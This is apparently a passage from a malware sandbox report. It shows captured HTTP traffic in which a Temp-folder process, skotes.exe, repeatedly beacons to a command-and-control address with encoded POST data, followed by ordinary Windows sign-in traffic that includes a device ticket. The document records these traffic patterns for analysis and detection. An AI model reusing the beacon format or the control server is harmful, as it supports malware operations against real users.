Nov 13, 2024 20:45:10.880445957 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50393	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:12.405225039 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:13.335535049 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50396	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:14.959847927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:15.881496906 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50397	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:17.397778988 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:18.326309919 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50398	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:19.943178892 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:20.857208967 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50400	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:22.379472017 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:23.285258055 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50404	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:24.913664103 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:25.840192080 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50405	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:27.359369993 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:28.282905102 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	50407	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:29.911561012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 13, 2024 20:45:30.837960958 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	50409	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:45:32.361064911 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:45:33.280492067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49715	40.126.32.76	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:16 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-13 19:39:16 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-13 19:39:16 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Wed, 13 Nov 2024 19:38:16 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_SN1 x-ms-request-id: 16a7f9b1-6b93-4dae-88b2-12a9f4187983 PPServer: PPV: 30 H: SN1PEPF0002F8FC V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Wed, 13 Nov 2024 19:39:16 GMT Connection: close Content-Length: 1918
2024-11-13 19:39:16 UTC	1918	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	49716	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:17 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 5a 61 62 4e 6a 77 36 30 55 65 6d 47 6b 70 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 33 36 66 32 35 35 36 64 62 31 38 31 38 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: zZabNjw60UemGkp3.1Context: 6536f2556db1818c
2024-11-13 19:39:17 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:17 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 5a 61 62 4e 6a 77 36 30 55 65 6d 47 6b 70 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 33 36 66 32 35 35 36 64 62 31 38 31 38 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 4e 31 50 6f 47 59 2f 6d 42 65 45 67 6f 38 6a 67 58 38 64 68 62 49 74 51 68 6a 52 4a 36 70 56 4c 48 32 38 35 41 6f 79 46 68 4c 67 71 78 51 53 62 63 72 6b 44 38 77 6b 67 39 5a 4c 49 44 35 52 69 4f 30 5a 6d 46 6e 32 4c 74 46 39 39 6c 31 4b 53 30 46 53 6b 55 55 39 34 6a 39 67 6d 7a 4d 4f 70 59 56 71 54 51 67 6d 48 42 39 54 31 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zZabNjw60UemGkp3.2Context: 6536f2556db1818c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfN1PoGY/mBeEgo8jgX8dhbItQhjRJ6pVLH285AoyFhLgqxQSbcrkD8wkg9ZLID5RiO0ZmFn2LtF99l1KS0FSkUU94j9gmzMOpYVqTQgmHB9T1
2024-11-13 19:39:17 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 7a 5a 61 62 4e 6a 77 36 30 55 65 6d 47 6b 70 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 35 33 36 66 32 35 35 36 64 62 31 38 31 38 63 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: zZabNjw60UemGkp3.3Context: 6536f2556db1818c
2024-11-13 19:39:17 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:17 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 78 54 59 2f 48 63 52 57 41 30 6d 4e 65 58 63 77 78 72 34 4f 4e 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: xTY/HcRWA0mNeXcwxr4ONg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49718	40.126.32.76	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:18 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-13 19:39:18 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-13 19:39:18 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Wed, 13 Nov 2024 19:38:18 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C519_SN1 x-ms-request-id: 893ea7ad-ca8b-418f-8896-7811a9406b37 PPServer: PPV: 30 H: SN1PEPF0003FB2E V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Wed, 13 Nov 2024 19:39:18 GMT Connection: close Content-Length: 11412
2024-11-13 19:39:18 UTC	11412	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	49721	40.126.32.76	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:20 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-11-13 19:39:20 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-13 19:39:20 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Wed, 13 Nov 2024 19:38:20 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C519_BL2 x-ms-request-id: 6d25b156-a624-4ea2-be99-67290a66c203 PPServer: PPV: 30 H: BL02EPF0001D7D7 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Wed, 13 Nov 2024 19:39:19 GMT Connection: close Content-Length: 11412
